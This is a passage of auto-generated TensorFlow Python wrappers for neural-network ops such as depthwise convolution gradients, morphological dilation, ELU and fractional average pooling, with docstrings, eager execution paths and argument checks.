out_backprop shape is `[batch, out_height, out_width, out_channels]`.
Gradients w.r.t. the output of the convolution.
strides: A list of `ints`.
The stride of the sliding window for each dimension of the input
of the convolution.
padding: A `string` from: `"SAME", "VALID", "EXPLICIT"`.
The type of padding algorithm to use.
explicit_paddings: An optional list of `ints`. Defaults to `[]`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, height, width, channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, channels, height, width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
1-D tensor of length 4. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each filter
element on that dimension. The dimension order is determined by the value of
`data_format`, see above for details. Dilations in the batch and depth
dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `filter`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "DepthwiseConv2dNativeBackpropInput", name, input_sizes, filter,
out_backprop, "strides", strides, "padding", padding,
"explicit_paddings", explicit_paddings, "data_format", data_format,
"dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return depthwise_conv2d_native_backprop_input_eager_fallback(
input_sizes, filter, out_backprop, strides=strides, padding=padding,
explicit_paddings=explicit_paddings, data_format=data_format,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'depthwise_conv2d_native_backprop_input' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'depthwise_conv2d_native_backprop_input' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'depthwise_conv2d_native_backprop_input' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"DepthwiseConv2dNativeBackpropInput", input_sizes=input_sizes,
filter=filter,
out_backprop=out_backprop,
strides=strides,
padding=padding,
explicit_paddings=explicit_paddings,
data_format=data_format,
dilations=dilations, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"explicit_paddings", _op.get_attr("explicit_paddings"),
"data_format", _op.get_attr("data_format"), "dilations",
_op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"DepthwiseConv2dNativeBackpropInput", _inputs_flat, _attrs, _result)
_result, = _result
return _result
DepthwiseConv2dNativeBackpropInput = tf_export("raw_ops.DepthwiseConv2dNativeBackpropInput")(_ops.to_raw_op(depthwise_conv2d_native_backprop_input))
def depthwise_conv2d_native_backprop_input_eager_fallback(input_sizes, filter, out_backprop, strides, padding, explicit_paddings, data_format, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'depthwise_conv2d_native_backprop_input' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'depthwise_conv2d_native_backprop_input' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'depthwise_conv2d_native_backprop_input' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([filter, out_backprop], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(filter, out_backprop) = _inputs_T
input_sizes = _ops.convert_to_tensor(input_sizes, _dtypes.int32)
_inputs_flat = [input_sizes, filter, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "padding", padding,
"explicit_paddings", explicit_paddings, "data_format", data_format,
"dilations", dilations)
_result = _execute.execute(b"DepthwiseConv2dNativeBackpropInput", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"DepthwiseConv2dNativeBackpropInput", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def dilation2d(input, filter, strides, rates, padding, name=None):
r"""Computes the grayscale dilation of 4-D `input` and 3-D `filter` tensors.
The `input` tensor has shape `[batch, in_height, in_width, depth]` and the
`filter` tensor has shape `[filter_height, filter_width, depth]`, i.e., each
input channel is processed independently of the others with its own structuring
function. The `output` tensor has shape
`[batch, out_height, out_width, depth]`. The spatial dimensions of the output
tensor depend on the `padding` algorithm. We currently only support the default
"NHWC" `data_format`.
In detail, the grayscale morphological 2-D dilation is the max-sum correlation
(for consistency with `conv2d`, we use unmirrored filters):
output[b, y, x, c] =
max_{dy, dx} input[b,
strides[1] * y + rates[1] * dy,
strides[2] * x + rates[2] * dx,
c] +
filter[dy, dx, c]
Max-pooling is a special case when the filter has size equal to the pooling
kernel size and contains all zeros.
Note on duality: The dilation of `input` by the `filter` is equal to the
negation of the erosion of `-input` by the reflected `filter`.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
4-D with shape `[batch, in_height, in_width, depth]`.
filter: A `Tensor`. Must have the same type as `input`.
3-D with shape `[filter_height, filter_width, depth]`.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of the input
tensor. Must be: `[1, stride_height, stride_width, 1]`.
rates: A list of `ints` that has length `>= 4`.
The input stride for atrous morphological dilation. Must be:
`[1, rate_height, rate_width, 1]`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Dilation2D", name, input, filter, "strides", strides, "rates",
rates, "padding", padding)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return dilation2d_eager_fallback(
input, filter, strides=strides, rates=rates, padding=padding,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'dilation2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
if not isinstance(rates, (list, tuple)):
raise TypeError(
"Expected list for 'rates' argument to "
"'dilation2d' Op, not %r." % rates)
rates = [_execute.make_int(_i, "rates") for _i in rates]
padding = _execute.make_str(padding, "padding")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Dilation2D", input=input, filter=filter, strides=strides,
rates=rates, padding=padding, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "rates", _op.get_attr("rates"),
"padding", _op.get_attr("padding"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Dilation2D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Dilation2D = tf_export("raw_ops.Dilation2D")(_ops.to_raw_op(dilation2d))
def dilation2d_eager_fallback(input, filter, strides, rates, padding, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'dilation2d' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
if not isinstance(rates, (list, tuple)):
raise TypeError(
"Expected list for 'rates' argument to "
"'dilation2d' Op, not %r." % rates)
rates = [_execute.make_int(_i, "rates") for _i in rates]
padding = _execute.make_str(padding, "padding")
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(input, filter) = _inputs_T
_inputs_flat = [input, filter]
_attrs = ("T", _attr_T, "strides", strides, "rates", rates, "padding",
padding)
_result = _execute.execute(b"Dilation2D", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Dilation2D", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def dilation2d_backprop_filter(input, filter, out_backprop, strides, rates, padding, name=None):
r"""Computes the gradient of morphological 2-D dilation with respect to the filter.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
4-D with shape `[batch, in_height, in_width, depth]`.
filter: A `Tensor`. Must have the same type as `input`.
3-D with shape `[filter_height, filter_width, depth]`.
out_backprop: A `Tensor`. Must have the same type as `input`.
4-D with shape `[batch, out_height, out_width, depth]`.
strides: A list of `ints` that has length `>= 4`.
1-D of length 4. The stride of the sliding window for each dimension of
the input tensor. Must be: `[1, stride_height, stride_width, 1]`.
rates: A list of `ints` that has length `>= 4`.
1-D of length 4. The input stride for atrous morphological dilation.
Must be: `[1, rate_height, rate_width, 1]`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Dilation2DBackpropFilter", name, input, filter, out_backprop,
"strides", strides, "rates", rates, "padding", padding)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return dilation2d_backprop_filter_eager_fallback(
input, filter, out_backprop, strides=strides, rates=rates,
padding=padding, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'dilation2d_backprop_filter' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
if not isinstance(rates, (list, tuple)):
raise TypeError(
"Expected list for 'rates' argument to "
"'dilation2d_backprop_filter' Op, not %r." % rates)
rates = [_execute.make_int(_i, "rates") for _i in rates]
padding = _execute.make_str(padding, "padding")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Dilation2DBackpropFilter", input=input, filter=filter,
out_backprop=out_backprop,
strides=strides, rates=rates,
padding=padding, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "rates", _op.get_attr("rates"),
"padding", _op.get_attr("padding"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Dilation2DBackpropFilter", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Dilation2DBackpropFilter = tf_export("raw_ops.Dilation2DBackpropFilter")(_ops.to_raw_op(dilation2d_backprop_filter))
def dilation2d_backprop_filter_eager_fallback(input, filter, out_backprop, strides, rates, padding, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'dilation2d_backprop_filter' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
if not isinstance(rates, (list, tuple)):
raise TypeError(
"Expected list for 'rates' argument to "
"'dilation2d_backprop_filter' Op, not %r." % rates)
rates = [_execute.make_int(_i, "rates") for _i in rates]
padding = _execute.make_str(padding, "padding")
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter, out_backprop], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(input, filter, out_backprop) = _inputs_T
_inputs_flat = [input, filter, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "rates", rates, "padding",
padding)
_result = _execute.execute(b"Dilation2DBackpropFilter", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Dilation2DBackpropFilter", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def dilation2d_backprop_input(input, filter, out_backprop, strides, rates, padding, name=None):
r"""Computes the gradient of morphological 2-D dilation with respect to the input.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
4-D with shape `[batch, in_height, in_width, depth]`.
filter: A `Tensor`. Must have the same type as `input`.
3-D with shape `[filter_height, filter_width, depth]`.
out_backprop: A `Tensor`. Must have the same type as `input`.
4-D with shape `[batch, out_height, out_width, depth]`.
strides: A list of `ints` that has length `>= 4`.
1-D of length 4. The stride of the sliding window for each dimension of
the input tensor. Must be: `[1, stride_height, stride_width, 1]`.
rates: A list of `ints` that has length `>= 4`.
1-D of length 4. The input stride for atrous morphological dilation.
Must be: `[1, rate_height, rate_width, 1]`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Dilation2DBackpropInput", name, input, filter, out_backprop,
"strides", strides, "rates", rates, "padding", padding)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return dilation2d_backprop_input_eager_fallback(
input, filter, out_backprop, strides=strides, rates=rates,
padding=padding, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'dilation2d_backprop_input' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
if not isinstance(rates, (list, tuple)):
raise TypeError(
"Expected list for 'rates' argument to "
"'dilation2d_backprop_input' Op, not %r." % rates)
rates = [_execute.make_int(_i, "rates") for _i in rates]
padding = _execute.make_str(padding, "padding")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Dilation2DBackpropInput", input=input, filter=filter,
out_backprop=out_backprop, strides=strides,
rates=rates, padding=padding, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "rates", _op.get_attr("rates"),
"padding", _op.get_attr("padding"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Dilation2DBackpropInput", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Dilation2DBackpropInput = tf_export("raw_ops.Dilation2DBackpropInput")(_ops.to_raw_op(dilation2d_backprop_input))
def dilation2d_backprop_input_eager_fallback(input, filter, out_backprop, strides, rates, padding, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'dilation2d_backprop_input' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
if not isinstance(rates, (list, tuple)):
raise TypeError(
"Expected list for 'rates' argument to "
"'dilation2d_backprop_input' Op, not %r." % rates)
rates = [_execute.make_int(_i, "rates") for _i in rates]
padding = _execute.make_str(padding, "padding")
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter, out_backprop], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(input, filter, out_backprop) = _inputs_T
_inputs_flat = [input, filter, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "rates", rates, "padding",
padding)
_result = _execute.execute(b"Dilation2DBackpropInput", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Dilation2DBackpropInput", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('nn.elu')
def elu(features, name=None):
r"""Computes exponential linear: `exp(features) - 1` if < 0, `features` otherwise.
See [Fast and Accurate Deep Network Learning by Exponential Linear Units (ELUs)
](http://arxiv.org/abs/1511.07289)
Args:
features: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `features`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Elu", name, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return elu_eager_fallback(
features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
elu, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Elu", features=features, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
elu, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Elu", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Elu = tf_export("raw_ops.Elu")(_ops.to_raw_op(elu))
def elu_eager_fallback(features, name, ctx):
_attr_T, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_inputs_flat = [features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"Elu", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Elu", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def elu_grad(gradients, outputs, name=None):
r"""Computes gradients for the exponential linear (Elu) operation.
Args:
gradients: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
The backpropagated gradients to the corresponding Elu operation.
outputs: A `Tensor`. Must have the same type as `gradients`.
The outputs of the corresponding Elu operation.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `gradients`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "EluGrad", name, gradients, outputs)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return elu_grad_eager_fallback(
gradients, outputs, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"EluGrad", gradients=gradients, outputs=outputs, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"EluGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
EluGrad = tf_export("raw_ops.EluGrad")(_ops.to_raw_op(elu_grad))
def elu_grad_eager_fallback(gradients, outputs, name, ctx):
_attr_T, _inputs_T = _execute.args_to_matching_eager([gradients, outputs], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(gradients, outputs) = _inputs_T
_inputs_flat = [gradients, outputs]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"EluGrad", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"EluGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
_FractionalAvgPoolOutput = collections.namedtuple(
"FractionalAvgPool",
["output", "row_pooling_sequence", "col_pooling_sequence"])
def fractional_avg_pool(value, pooling_ratio, pseudo_random=False, overlapping=False, deterministic=False, seed=0, seed2=0, name=None):
r"""Performs fractional average pooling on the input.
Fractional average pooling is similar to Fractional max pooling in the pooling
region generation step. The only difference is that after pooling regions are
generated, a mean operation is performed instead of a max operation in each
pooling region.
Args:
value: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `int64`.
4-D with shape `[batch, height, width, channels]`.
pooling_ratio: A list of `floats` that has length `>= 4`.
Pooling ratio for each dimension of `value`, currently only
supports row and col dimension and should be >= 1.0. For example, a valid
pooling ratio looks like [1.0, 1.44, 1.73, 1.0]. The first and last elements
must be 1.0 because we don't allow pooling on batch and channels
dimensions. 1.44 and 1.73 are pooling ratio on height and width dimensions
respectively.
pseudo_random: An optional `bool`. Defaults to `False`.
When set to True, generates the pooling sequence in a
pseudorandom fashion, otherwise, in a random fashion. Check paper [Benjamin
Graham, Fractional Max-Pooling](http://arxiv.org/abs/1412.6071) for
difference between pseudorandom and random.
overlapping: An optional `bool`. Defaults to `False`.
When set to True, it means when pooling, the values at the boundary
of adjacent pooling cells are used by both cells. For example:
`index 0 1 2 3 4`
`value 20 5 16 3 7`
If the pooling sequence is [0, 2, 4], then 16, at index 2 will be used twice.
The result would be [41/3, 26/3] for fractional avg pooling.
deterministic: An optional `bool`. Defaults to `False`.
When set to True, a fixed pooling region will be used when
iterating over a FractionalAvgPool node in the computation graph. Mainly used
in unit test to make FractionalAvgPool deterministic.
seed: An optional `int`. Defaults to `0`.
If either seed or seed2 are set to be non-zero, the random number
generator is seeded by the given seed. Otherwise, it is seeded by a
random seed.
seed2: An optional `int`. Defaults to `0`.
An second seed to avoid seed collision.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, row_pooling_sequence, col_pooling_sequence).
output: A `Tensor`. Has the same type as `value`.
row_pooling_sequence: A `Tensor` of type `int64`.
col_pooling_sequence: A `Tensor` of type `int64`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FractionalAvgPool", name, value, "pooling_ratio",
pooling_ratio, "pseudo_random", pseudo_random, "overlapping",
overlapping, "deterministic", deterministic, "seed", seed, "seed2",
seed2)
_result = _FractionalAvgPoolOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fractional_avg_pool_eager_fallback(
value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random,
overlapping=overlapping, deterministic=deterministic, seed=seed,
seed2=seed2, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(pooling_ratio, (list, tuple)):
raise TypeError(
"Expected list for 'pooling_ratio' argument to "
"'fractional_avg_pool' Op, not %r." % pooling_ratio)
pooling_ratio = [_execute.make_float(_f, "pooling_ratio") for _f in pooling_ratio]
if pseudo_random is None:
pseudo_random = False
pseudo_random = _execute.make_bool(pseudo_random, "pseudo_random")
if overlapping is None:
overlapping = False
overlapping = _execute.make_bool(overlapping, "overlapping")
if deterministic is None:
deterministic = False
deterministic = _execute.make_bool(deterministic, "deterministic")
if seed is None:
seed = 0
seed = _execute.make_int(seed, "seed")
if seed2 is None:
seed2 = 0
seed2 = _execute.make_int(seed2, "seed2")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FractionalAvgPool", value=value, pooling_ratio=pooling_ratio,
pseudo_random=pseudo_random,
overlapping=overlapping,
deterministic=deterministic, seed=seed,
seed2=seed2, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("pooling_ratio", _op.get_attr("pooling_ratio"), "pseudo_random",
_op._get_attr_bool("pseudo_random"), "overlapping",
_op._get_attr_bool("overlapping"), "deterministic",
_op._get_attr_bool("deterministic"), "seed",
_op._get_attr_int("seed"), "seed2", _op._get_attr_int("seed2"),
"T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FractionalAvgPool", _inputs_flat, _attrs, _result)
_result = _FractionalAvgPoolOutput._make(_result)
return _result
FractionalAvgPool = tf_export("raw_ops.FractionalAvgPool")(_ops.to_raw_op(fractional_avg_pool))
def fractional_avg_pool_eager_fallback(value, pooling_ratio, pseudo_random, overlapping, deterministic, seed, seed2, name, ctx):
if not isinstance(pooling_ratio, (list, tuple)):
raise TypeError(
"Expected list for 'pooling_ratio' argument to "
"'fractional_avg_pool' Op, not %r." % pooling_ratio)
pooling_ratio = [_execute.make_float(_f, "pooling_ratio") for _f in pooling_ratio]
if pseudo_random is None:
pseudo_random = False
pseudo_random = _execute.make_bool(pseudo_random, "pseudo_random")
if overlapping is None:
overlapping = False
overlapping = _execute.make_bool(overlapping, "overlapping")
if deterministic is None:
deterministic = False
deterministic = _execute.make_bool(deterministic, "deterministic")
if seed is None:
seed = 0
seed = _execute.make_int(seed, "seed")
if seed2 is None:
seed2 = 0
seed2 = _execute.make_int(seed2, "seed2")
_attr_T, (value,) = _execute.args_to_matching_eager([value], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.int64, ])
_inputs_flat = [value]
_attrs = ("pooling_ratio", pooling_ratio, "pseudo_random", pseudo_random,
"overlapping", overlapping, "deterministic", deterministic, "seed", seed,
"seed2", seed2, "T", _attr_T)
_result = _execute.execute(b"FractionalAvgPool", 3, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"FractionalAvgPool", _inputs_flat, _attrs, _result)
_result = _FractionalAvgPoolOutput._make(_result)
return _result
def fractional_avg_pool_grad(orig_input_tensor_shape, out_backprop, row_pooling_sequence, col_pooling_sequence, overlapping=False, name=None):
r"""Computes gradient of the FractionalAvgPool function.
Unlike FractionalMaxPoolGrad, we don't need to find arg_max for
FractionalAvgPoolGrad, we just need to evenly back-propagate each element of
out_backprop to those indices that form the same pooling cell. Therefore, we
just need to know the shape of original input tensor, instead of the whole
tensor.
Args:
orig_input_tensor_shape: A `Tensor` of type `int64`.
Original input tensor shape for `fractional_avg_pool`
out_backprop: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `int64`.
4-D with shape `[batch, height, width, channels]`. Gradients
w.r.t. the output of `fractional_avg_pool`.
row_pooling_sequence: A `Tensor` of type `int64`.
row pooling sequence, form pooling region with
col_pooling_sequence.
col_pooling_sequence: A `Tensor` of type `int64`.
column pooling sequence, form pooling region with
row_pooling sequence.
overlapping: An optional `bool`. Defaults to `False`.
When set to True, it means when pooling, the values at the boundary
of adjacent pooling cells are used by both cells. For example:
`index 0 1 2 3 4`
`value 20 5 16 3 7`
If the pooling sequence is [0, 2, 4], then 16, at index 2 will be used twice.
The result would be [41/3, 26/3] for fractional avg pooling.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `out_backprop`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "FractionalAvgPoolGrad", name, orig_input_tensor_shape,
out_backprop, row_pooling_sequence, col_pooling_sequence,
"overlapping", overlapping)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return fractional_avg_pool_grad_eager_fallback(
orig_input_tensor_shape, out_backprop, row_pooling_sequence,
col_pooling_sequence, overlapping=overlapping, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if overlapping is None:
overlapping = False
overlapping = _execute.make_bool(overlapping, "overlapping")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"FractionalAvgPoolGrad", orig_input_tensor_shape=orig_input_tensor_shape,
out_backprop=out_backprop,
row_pooling_sequence=row_pooling_sequence,
col_pooling_sequence=col_pooling_sequence,
overlapping=overlapping, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("overlapping", _op._get_attr_bool("overlapping"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"FractionalAvgPoolGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
FractionalAvgPoolGrad = tf_export("raw_ops.FractionalAvgPoolGrad")(_ops.to_raw_op(fractional_avg_pool_grad))
def fractional_avg_pool_grad_eager_fallback(orig_input_tensor_shape, out_backprop, row_pooling_sequence, col_pooling_sequence, overlapping, name, ctx):
if overlapping is None:
